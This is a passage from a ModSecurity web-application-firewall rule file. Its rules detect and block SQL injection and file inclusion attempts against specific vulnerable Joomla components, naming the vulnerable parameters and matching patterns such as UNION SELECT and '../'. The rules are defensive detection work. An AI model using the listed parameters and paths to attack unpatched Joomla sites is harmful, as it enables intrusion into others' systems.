REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010710,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010711) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010711,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010712) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010712,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010713) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010713,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010714) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010714,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule ARGS:idea_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010750) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010750,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010751) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010751,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010752) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010752,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010753,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010754) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010754,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule ARGS:Id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010780) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mediaslide/viewer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010780,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37440'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010805) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010805,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010806) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010806,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010807) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010807,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010808) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010808,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010809) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010809,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule ARGS:cid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_intuit/models/intuit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10730'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:approval "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010843,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010844,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010845,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010846,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010842) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010842,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_morfeoshow/morfeoshow.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010848,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:user_id\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010853,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010854,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010855) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010855,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010856,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010857,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010924) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010924,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter SELECT FROM SQL 